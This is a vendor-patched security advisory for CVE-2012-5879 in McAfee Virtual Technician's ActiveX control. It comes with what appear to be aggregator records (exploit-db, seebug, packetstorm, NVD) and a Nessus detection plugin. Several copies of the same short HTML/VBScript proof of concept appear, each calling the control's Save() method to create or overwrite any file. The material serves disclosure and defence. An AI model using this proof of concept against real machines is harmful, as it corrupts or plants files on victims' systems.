Advisory ID: HTB23128
Product: McAfee Virtual Technician (MVT) 6.5.0.2101
Vendor: McAfee
Vulnerable Version(s): 6.5.0.2101 and probably prior
Tested Version: 6.5.0.2101 on Windows 7 SP1 and Internet Explorer 9
Vendor Notification: November 19, 2012
Vendor Patch: March 15, 2013
Public Disclosure: March 27, 2013
Vulnerability Type: Exposed Unsafe ActiveX Method [CWE-618]
CVE Reference: CVE-2012-5879
Risk Level: Medium
CVSSv2 Base Score: 5.8 (AV:N/AC:M/Au:N/C:N/I:P/A:P)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered vulnerability in McAfee Virtual Technician ActiveX control, which can be exploited by remote malicious person to overwrite arbitrary files with garbage data on a vulnerable system.
1) Insecure method in McAfee Virtual Technician ActiveX control: CVE-2012-5879
The vulnerability exists due to the ActiveX control including the insecure "Save()" method in "McHealthCheck.dll" DLL. This can be exploited to corrupt or create arbitrary files in the context of the current user.
The following PoC code is available:
<html>
<h4>McAfee Virtual Technician [McHealthCheck.dll] v.6.5.0.2101</h4>
<h5>This proof of concepts creates an arbitrary file in a system [Windows 7, SP1 with IE 9.0] by leveraging the McHealthCheck.dll ActiveX module and the method "Save()":</h5>
<object classid='clsid:24565A99-ADDA-47B9-9E86-3C4C3360E256' id='target'></object>
<input type="button" value="Boom!" language="VBScript" OnClick="CreateArbitraryFile()">
<script language="VBScript">
sub CreateArbitraryFile()
arg1="FilePath\File_name_to_corrupt_or_create"
target.Save arg1
End Sub
</script>
</html>
-----------------------------------------------------------------------------------------------
Solution:
Upgrade to McAfee Virtual Technician (MVT) 7.1
More Information:
https://kc.mcafee.com/corporate/index?page=content&id=SB10040
-----------------------------------------------------------------------------------------------
References:
[1] High-Tech Bridge Advisory HTB23128 - https://www.htbridge.com/advisory/HTB23128 - McAfee Virtual Technician ActiveX control Insecure Method.
[2] McAfee Virtual Technician - mvt.mcafee.com - McAfee Virtual Technician collects information on your computer system so that McAfee can diagnose and solve problems related to your McAfee software.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
-----------------------------------------------------------------------------------------------
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
{"lastseen": "2020-04-01T19:04:30", "references": [], "description": "\nMcAfee Virtual Technician (MVT) 6.5.0.2101 - Insecure ActiveX Method", "edition": 1, "reporter": "High-Tech Bridge SA", "exploitpack": {"type": "remote", "platform": "windows"}, "published": "2013-03-29T00:00:00", "title": "McAfee Virtual Technician (MVT) 6.5.0.2101 - Insecure ActiveX Method", "type": "exploitpack", "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2012-5879"]}, {"type": "seebug", "idList": ["SSV:60712"]}, {"type": "nessus", "idList": ["MCAFEE_VIRTUAL_TECHNICIAN_ACTIVEX1.NASL"]}, {"type": "htbridge", "idList": ["HTB23128"]}, {"type": "exploitdb", "idList": ["EDB-ID:24907"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:120979"]}], "modified": "2020-04-01T19:04:30", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2020-04-01T19:04:30", "rev": 2}, "vulnersScore": 5.8}, "bulletinFamily": "exploit", "cvelist": ["CVE-2012-5879"], "modified": "2013-03-29T00:00:00", "id": "EXPLOITPACK:5FC760F88F905C8C4A069765614341D7", "href": "", "viewCount": 1, "sourceData": "Advisory ID: HTB23128\nProduct: McAfee Virtual Technician (MVT) 6.5.0.2101\nVendor: McAfee\nVulnerable Version(s): 6.5.0.2101 and probably prior\nTested Version: 6.5.0.2101 on Windows 7 SP1 and Internet Explorer 9\nVendor Notification: November 19, 2012 \nVendor Patch: March 15, 2013 \nPublic Disclosure: March 27, 2013 \nVulnerability Type: Exposed Unsafe ActiveX Method [CWE-618]\nCVE Reference: CVE-2012-5879\nRisk Level: Medium \nCVSSv2 Base Score: 5.8 (AV:N/AC:M/Au:N/C:N/I:P/A:P)\nSolution Status: Fixed by Vendor\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \n\n-----------------------------------------------------------------------------------------------\n\nAdvisory Details:\n\nHigh-Tech Bridge Security Research Lab discovered vulnerability in McAfee Virtual Technician ActiveX control, which can be exploited by remote malicious person to overwrite arbitrary files with garbage data on a vulnerable system.\n\n\n1) Insecure method in McAfee Virtual Technician ActiveX control: CVE-2012-5879\n\nThe vulnerability exists due to the ActiveX control including the insecure \"Save()\" method in \"McHealthCheck.dll\" DLL. This can be exploited to corrupt or create arbitrary files in the context of the current user.\n\nThe following PoC code is available:\n\n\n<html>\n<h4>McAfee Virtual Technician [McHealthCheck.dll] v.6.5.0.2101</h4>\n<h5>This proof of concepts creates an arbitrary file in a system [Windows 7, SP1 with IE 9.0] by leveraging the McHealthCheck.dll ActiveX module and the method \"Save()\":</h5>\n<object classid='clsid:24565A99-ADDA-47B9-9E86-3C4C3360E256' id='target'></object>\n<input type=\"button\" value=\"Boom!\" language=\"VBScript\" OnClick=\"CreateArbitraryFile()\">\n\n<script language=\"VBScript\">\nsub CreateArbitraryFile()\narg1=\"FilePath\\File_name_to_corrupt_or_create\"\ntarget.Save arg1 \nEnd Sub\n\n</script>\n</html>\n\n\n-----------------------------------------------------------------------------------------------\n\nSolution:\n\nUpgrade to McAfee Virtual Technician (MVT) 7.1\nMore Information:\nhttps://kc.mcafee.com/corporate/index?page=content&id=SB10040\n\n-----------------------------------------------------------------------------------------------\n\nReferences:\n\n[1] High-Tech Bridge Advisory HTB23128 - https://www.htbridge.com/advisory/HTB23128 - McAfee Virtual Technician ActiveX control Insecure Method.\n[2] McAfee Virtual Technician - mvt.mcafee.com - McAfee Virtual Technician collects information on your computer system so that McAfee can diagnose and solve problems related to your McAfee software.\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures.\n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \n\n-----------------------------------------------------------------------------------------------\n\nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.", "cvss": {"score": 8.2, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:P"}}
{"cve": [{"lastseen": "2021-02-02T05:59:57", "description": "An ActiveX control in McHealthCheck.dll in McAfee Virtual Technician (MVT) and ePO-MVT 6.5.0.2101 and earlier allows remote attackers to modify or create arbitrary files via a full pathname argument to the Save method.", "edition": 6, "cvss3": {}, "published": "2013-03-28T23:55:00", "title": "CVE-2012-5879", "type": "cve", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "PARTIAL", "integrityImpact": "COMPLETE", "baseScore": 8.2, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 9.5, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5879"], "modified": "2013-03-29T14:18:00", "cpe": ["cpe:/a:mcafee:epo_mcafee_virtual_technician:1.0.4.0", "cpe:/a:mcafee:epo_mcafee_virtual_technician:6.5.0.2101", "cpe:/a:mcafee:epo_mcafee_virtual_technician:1.0", "cpe:/a:mcafee:epo_mcafee_virtual_technician:1.0.7", "cpe:/a:mcafee:epo_mcafee_virtual_technician:1.0.9", "cpe:/a:mcafee:epo_mcafee_virtual_technician:1.0.8", "cpe:/a:mcafee:mcafee_virtual_technician:6.5.0.2101", "cpe:/a:mcafee:mcafee_virtual_technician:6.3.0.1911"], "id": "CVE-2012-5879", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-5879", "cvss": {"score": 8.2, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:P"}, "cpe23": ["cpe:2.3:a:mcafee:mcafee_virtual_technician:6.3.0.1911:*:*:*:*:*:*:*", "cpe:2.3:a:mcafee:epo_mcafee_virtual_technician:1.0.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:mcafee:epo_mcafee_virtual_technician:1.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:mcafee:epo_mcafee_virtual_technician:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:mcafee:epo_mcafee_virtual_technician:1.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:mcafee:epo_mcafee_virtual_technician:1.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:mcafee:mcafee_virtual_technician:6.5.0.2101:*:*:*:*:*:*:*", "cpe:2.3:a:mcafee:epo_mcafee_virtual_technician:6.5.0.2101:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2016-02-03T00:15:43", "description": "McAfee Virtual Technician (MVT) 6.5.0.2101 - Insecure ActiveX Method. CVE-2012-5879. Remote exploit for windows platform", "published": "2013-03-29T00:00:00", "type": "exploitdb", "title": "McAfee Virtual Technician MVT 6.5.0.2101 - Insecure ActiveX Method", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-5879"], "modified": "2013-03-29T00:00:00", "id": "EDB-ID:24907", "href": "https://www.exploit-db.com/exploits/24907/", "sourceData": "Advisory ID: HTB23128\r\nProduct: McAfee Virtual Technician (MVT) 6.5.0.2101\r\nVendor: McAfee\r\nVulnerable Version(s): 6.5.0.2101 and probably prior\r\nTested Version: 6.5.0.2101 on Windows 7 SP1 and Internet Explorer 9\r\nVendor Notification: November 19, 2012 \r\nVendor Patch: March 15, 2013 \r\nPublic Disclosure: March 27, 2013 \r\nVulnerability Type: Exposed Unsafe ActiveX Method [CWE-618]\r\nCVE Reference: CVE-2012-5879\r\nRisk Level: Medium \r\nCVSSv2 Base Score: 5.8 (AV:N/AC:M/Au:N/C:N/I:P/A:P)\r\nSolution Status: Fixed by Vendor\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered vulnerability in McAfee Virtual Technician ActiveX control, which can be exploited by remote malicious person to overwrite arbitrary files with garbage data on a vulnerable system.\r\n\r\n\r\n1) Insecure method in McAfee Virtual Technician ActiveX control: CVE-2012-5879\r\n\r\nThe vulnerability exists due to the ActiveX control including the insecure \"Save()\" method in \"McHealthCheck.dll\" DLL. This can be exploited to corrupt or create arbitrary files in the context of the current user.\r\n\r\nThe following PoC code is available:\r\n\r\n\r\n<html>\r\n<h4>McAfee Virtual Technician [McHealthCheck.dll] v.6.5.0.2101</h4>\r\n<h5>This proof of concepts creates an arbitrary file in a system [Windows 7, SP1 with IE 9.0] by leveraging the McHealthCheck.dll ActiveX module and the method \"Save()\":</h5>\r\n<object classid='clsid:24565A99-ADDA-47B9-9E86-3C4C3360E256' id='target'></object>\r\n<input type=\"button\" value=\"Boom!\" language=\"VBScript\" OnClick=\"CreateArbitraryFile()\">\r\n\r\n<script language=\"VBScript\">\r\nsub CreateArbitraryFile()\r\narg1=\"FilePath\\File_name_to_corrupt_or_create\"\r\ntarget.Save arg1 \r\nEnd Sub\r\n\r\n</script>\r\n</html>\r\n\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nUpgrade to McAfee Virtual Technician (MVT) 7.1\r\nMore Information:\r\nhttps://kc.mcafee.com/corporate/index?page=content&id=SB10040\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nReferences:\r\n\r\n[1] High-Tech Bridge Advisory HTB23128 - https://www.htbridge.com/advisory/HTB23128 - McAfee Virtual Technician ActiveX control Insecure Method.\r\n[2] McAfee Virtual Technician - mvt.mcafee.com - McAfee Virtual Technician collects information on your computer system so that McAfee can diagnose and solve problems related to your McAfee software.\r\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00c2\u017d is a dictionary of publicly known information security vulnerabilities and exposures.\r\n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.", "cvss": {"score": 8.2, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/24907/"}], "seebug": [{"lastseen": "2017-11-19T17:46:32", "description": "BUGTRAQ ID: 58750\r\nCVE(CAN) ID: CVE-2012-5879\r\n\r\nMcAfee Virtual Technician\u662f\u5206\u6790\u8bca\u65ad\u5de5\u5177\u3002\r\n\r\nMcAfee Virtual Technician 6.5.0.2101\u53ca\u5176\u4ed6\u7248\u672c\u7684ActiveX\u63a7\u4ef6\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\u53ef\u5bfc\u81f4\u653b\u51fb\u8005\u8986\u76d6\u6216\u521b\u5efa\u53d7\u5f71\u54cd\u5e94\u7528\u4e0a\u4e0b\u6587\u5185\u7684\u4efb\u610f\u6587\u4ef6\u3002\u8be5\u5b89\u5168\u6f0f\u6d1e\u5b58\u5728\u4e8e"McHealthCheck.dll"\u7684"Save()"\u65b9\u6cd5\u3002\n0\nMcAfee Virtual Technician 6.5.0.2101\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nMcAfee\r\n------\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\nhttp://www.mcafee.com/", "published": "2013-03-29T00:00:00", "title": "McAfee Virtual Technician ActiveX \u63a7\u4ef6'Save()'\u65b9\u6cd5\u6587\u4ef6\u8986\u76d6\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-5879"], "modified": "2013-03-29T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-60712", "id": "SSV:60712", "sourceData": "\n <html>\r\n<h4>McAfee Virtual Technician [McHealthCheck.dll] v.6.5.0.2101</h4>\r\n<h5>This proof of concepts creates an arbitrary file in a system [Windows 7, SP1 with IE 9.0] by leveraging the McHealthCheck.dll ActiveX module and the method "Save()":</h5>\r\n<object classid='clsid:24565A99-ADDA-47B9-9E86-3C4C3360E256' id='target'></object>\r\n<input type="button" value="Boom!" language="VBScript" OnClick="CreateArbitraryFile()">\r\n\r\n<script language="VBScript">\r\nsub CreateArbitraryFile()\r\narg1="FilePath\\File_name_to_corrupt_or_create"\r\ntarget.Save arg1\r\nEnd Sub\r\n\r\n</script>\r\n</html>\n ", "cvss": {"score": 8.2, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-60712"}], "htbridge": [{"lastseen": "2020-12-24T11:20:37", "bulletinFamily": "software", "cvelist": ["CVE-2012-5879"], "description": "High-Tech Bridge Security Research Lab discovered vulnerability in McAfee Virtual Technician ActiveX control, which can be exploited by remote malicious person to overwrite arbitrary files with garbage data on a vulnerable system. \n \n1) Insecure method in McAfee Virtual Technician ActiveX control: CVE-2012-5879 \nThe vulnerability exists due to the ActiveX control including the insecure \"Save()\" method in \"McHealthCheck.dll\" DLL. This can be exploited to corrupt or create arbitrary files in the context of the current user. \nThe following PoC code is available: \n<html> \n<h4>McAfee Virtual Technician [McHealthCheck.dll] v.6.5.0.2101</h4> \n<h5>This proof of concepts creates an arbitrary file in a system [Windows 7, SP1 with IE 9.0] by leveraging the McHealthCheck.dll ActiveX module and the method \"Save()\":</h5> \n<object classid='clsid:24565A99-ADDA-47B9-9E86-3C4C3360E256' id='target'></object> \n<input type=\"button\" value=\"Boom!\" language=\"VBScript\" OnClick=\"CreateArbitraryFile()\"> \n<script language=\"VBScript\"> \nsub CreateArbitraryFile() \narg1=\"FilePath\\File_name_to_corrupt_or_create\" \ntarge t.Save arg1 \nEnd Sub \n</script> \n</html>\n", "modified": "2013-03-26T00:00:00", "published": "2012-11-19T00:00:00", "id": "HTB23128", "href": "https://www.htbridge.com/advisory/HTB23128", "type": "htbridge", "title": "McAfee Virtual Technician ActiveX Control Insecure Method", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:17:33", "description": "", "published": "2013-03-27T00:00:00", "type": "packetstorm", "title": "McAfee Virtual Technician (MVT) 6.5.0.2101 Unsafe Active-X", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-5879"], "modified": "2013-03-27T00:00:00", "id": "PACKETSTORM:120979", "href": "https://packetstormsecurity.com/files/120979/McAfee-Virtual-Technician-MVT-6.5.0.2101-Unsafe-Active-X.html", "sourceData": "`Advisory ID: HTB23128 \nProduct: McAfee Virtual Technician (MVT) 6.5.0.2101 \nVendor: McAfee \nVulnerable Version(s): 6.5.0.2101 and probably prior \nTested Version: 6.5.0.2101 on Windows 7 SP1 and Internet Explorer 9 \nVendor Notification: November 19, 2012 \nVendor Patch: March 15, 2013 \nPublic Disclosure: March 27, 2013 \nVulnerability Type: Exposed Unsafe ActiveX Method [CWE-618] \nCVE Reference: CVE-2012-5879 \nRisk Level: Medium \nCVSSv2 Base Score: 5.8 (AV:N/AC:M/Au:N/C:N/I:P/A:P) \nSolution Status: Fixed by Vendor \nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \n \n----------------------------------------------------------------------------------------------- \n \nAdvisory Details: \n \nHigh-Tech Bridge Security Research Lab discovered vulnerability in McAfee Virtual Technician ActiveX control, which can be exploited by remote malicious person to overwrite arbitrary files with garbage data on a vulnerable system. \n \n \n1) Insecure method in McAfee Virtual Technician ActiveX control: CVE-2012-5879 \n \nThe vulnerability exists due to the ActiveX control including the insecure \"Save()\" method in \"McHealthCheck.dll\" DLL. This can be exploited to corrupt or create arbitrary files in the context of the current user. \n \nThe following PoC code is available: \n \n \n<html> \n<h4>McAfee Virtual Technician [McHealthCheck.dll] v.6.5.0.2101</h4> \n<h5>This proof of concepts creates an arbitrary file in a system [Windows 7, SP1 with IE 9.0] by leveraging the McHealthCheck.dll ActiveX module and the method \"Save()\":</h5> \n<object classid='clsid:24565A99-ADDA-47B9-9E86-3C4C3360E256' id='target'></object> \n<input type=\"button\" value=\"Boom!\" language=\"VBScript\" OnClick=\"CreateArbitraryFile()\"> \n \n<script language=\"VBScript\"> \nsub CreateArbitraryFile() \narg1=\"FilePath\\File_name_to_corrupt_or_create\" \ntarget.Save arg1 \nEnd Sub \n \n</script> \n</html> \n \n \n----------------------------------------------------------------------------------------------- \n \nSolution: \n \nUpgrade to McAfee Virtual Technician (MVT) 7.1 \nMore Information: \nhttps://kc.mcafee.com/corporate/index?page=content&id=SB10040 \n \n----------------------------------------------------------------------------------------------- \n \nReferences: \n \n[1] High-Tech Bridge Advisory HTB23128 - https://www.htbridge.com/advisory/HTB23128 - McAfee Virtual Technician ActiveX control Insecure Method. \n[2] McAfee Virtual Technician - mvt.mcafee.com - McAfee Virtual Technician collects information on your computer system so that McAfee can diagnose and solve problems related to your McAfee software. \n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures. \n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \n \n----------------------------------------------------------------------------------------------- \n \nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. \n`\n", "cvss": {"score": 8.2, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/120979/mcafee65-activex.txt"}], "nessus": [{"lastseen": "2021-02-01T04:04:10", "description": "The remote Windows host has a version of the McAfee Virtual Technician\n/ ePolicy Orchestrator McHealthCheck.dll ActiveX control that allows\narbitrary files to be corrupted / overwritten due to a flaw in the\nSave() method.\n\nIf an attacker can trick a user on the affected host into viewing a\nspecially crafted HTML document, this issue could potentially be\nleveraged to overwrite files, potentially leading to remote code\nexecution.", "edition": 25, "published": "2013-04-12T00:00:00", "title": "McAfee Virtual Technician McHealthCheck.dll ActiveX Control Save() Method Arbitrary File Overwrite (SB10040)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-5879"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/a:mcafee:mcafee_virtual_technician"], "id": "MCAFEE_VIRTUAL_TECHNICIAN_ACTIVEX1.NASL", "href": "https://www.tenable.com/plugins/nessus/65942", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(65942);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/11/27\");\n\n script_cve_id(\"CVE-2012-5879\");\n script_bugtraq_id(58750);\n script_xref(name:\"EDB-ID\", value:\"24907\");\n script_xref(name:\"MCAFEE-SB\", value:\"SB10040\");\n\n script_name(english:\"McAfee Virtual Technician McHealthCheck.dll ActiveX Control Save() Method Arbitrary File Overwrite (SB10040)\");\n script_summary(english:\"Checks control's file version\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An ActiveX control installed on the remote Windows host can be abused\nto overwrite arbitrary files.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host has a version of the McAfee Virtual Technician\n/ ePolicy Orchestrator McHealthCheck.dll ActiveX control that allows\narbitrary files to be corrupted / overwritten due to a flaw in the\nSave() method.\n\nIf an attacker can trick a user on the affected host into viewing a\nspecially crafted HTML document, this issue could potentially be\nleveraged to overwrite files, potentially leading to remote code\nexecution.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://kc.mcafee.com/corporate/index?page=content&id=SB10040\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to McAfee Virtual Technician 7.1 / ePolicy Orchestrator 1.1.0\nor later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:C/I:C/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2012-5879\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/03/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/03/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/04/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mcafee:mcafee_virtual_technician\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_activex_func.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\n\nregistry_init();\nhklm = registry_hive_connect(hive:HKEY_LOCAL_MACHINE, exit_on_fail:TRUE);\nkey = 'SOFTWARE\\\\Classes\\\\McHealthCheck.McHealthCheck\\\\CLSID\\\\';\n\nclsid = get_registry_value(handle:hklm, item:key);\n\nRegCloseKey(handle:hklm);\n\nclose_registry();\n\nif (isnull(clsid)) audit(AUDIT_NOT_INST, 'McAfee Virtual Technician');\n\nif (activex_init() != ACX_OK) audit(AUDIT_FN_FAIL,'activex_init');\n\ninfo = '';\n\nvuln_version = '6.5.0.2101';\nfixed_version = '7.1';\n\nfile = activex_get_filename(clsid:clsid);\n\nif (isnull(file))\n{\n activex_end();\n audit(AUDIT_FN_FAIL, 'activex_get_filename');\n}\n\nif (!file)\n{\n activex_end();\n audit(AUDIT_ACTIVEX_NOT_FOUND, clsid);\n}\n\n# Get its version.\nversion = activex_get_fileversion(clsid:clsid);\nif (isnull(version))\n{\n activex_end();\n audit(AUDIT_FN_FAIL, 'activex_get_fileversion');\n}\nif (version == \"\") audit(AUDIT_VER_FAIL, file);\n\nif (ver_compare(ver:version, fix:vuln_version) <= 0)\n{\n if (report_paranoia > 1 || activex_get_killbit(clsid:clsid) == 0)\n {\n info += '\\n Class identifier : ' + clsid +\n '\\n Filename : ' + file +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_version + '\\n';\n }\n}\n\nactivex_end();\n\n# Report findings.\nif (info)\n{\n if (report_paranoia > 1)\n {\n report = info +\n '\\n' +\n 'Note, though, that Nessus did not check whether the kill bit was\\n' +\n \"set for the control's CLSID because of the Report Paranoia setting\" + '\\n' +\n 'in effect when this scan was run.\\n';\n }\n else\n {\n report = info +\n '\\n' +\n 'Moreover, its kill bit is not set so it is accessible via Internet\\n' +\n 'Explorer.\\n';\n }\n\n if (report_verbosity > 0) security_hole(port:kb_smb_transport(), extra:report);\n else security_hole(kb_smb_transport());\n\n exit(0);\n}\nelse\n{\n if (ver_compare(ver:version, fix:vuln_version) > 0)\n audit(AUDIT_INST_VER_NOT_VULN, 'McAfee Virtual Technician', version);\n else\n audit(AUDIT_ACTIVEX, version);\n}\n", "cvss": {"score": 8.2, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:P"}}]}
